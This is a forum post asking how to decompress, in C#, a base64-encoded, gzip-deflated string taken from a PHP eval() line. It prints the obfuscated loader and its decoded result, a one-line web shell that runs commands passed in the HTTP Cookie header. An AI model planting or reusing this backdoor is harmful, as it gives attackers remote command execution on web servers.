Well, the string comes from php code:
Code:eval(gzinflate(base64_decode('s7ezsS/IKFCodihILC4uySgq1UhPLUnNK9NQ8ggJCYh39vf39nRV0tS0rlWwB6oFAA==')));
But i want to decode it using c#... so i have to decode the string:Itīs encoded with base64, decoding it is easy, the problem is that i tryed some codes that i find in google to decompress but no luck. To be honest i have no idea about how can i solve it... perhaps someone can help me.Code:s7ezsS/IKFCodihILC4uySgq1UhPLUnNK9NQ8ggJCYh39vf39nRV0tS0rlWwB6oFAA==
I know that the result of decode that string should be something like:
Code:{@passthru(getenv("HTTP_COOKIE"));}
Thanks in advancce.



LinkBack URL
About LinkBacks


